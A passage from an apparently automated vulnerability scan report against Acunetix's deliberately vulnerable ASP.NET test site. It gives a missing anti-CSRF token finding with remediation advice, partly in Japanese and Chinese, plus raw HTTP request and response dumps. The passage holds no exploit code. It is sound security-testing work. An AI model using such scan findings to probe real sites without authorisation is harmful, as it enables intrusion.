href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        13. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q944e4UqgWJpySuZGYD9y7m9ZXo/Q==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
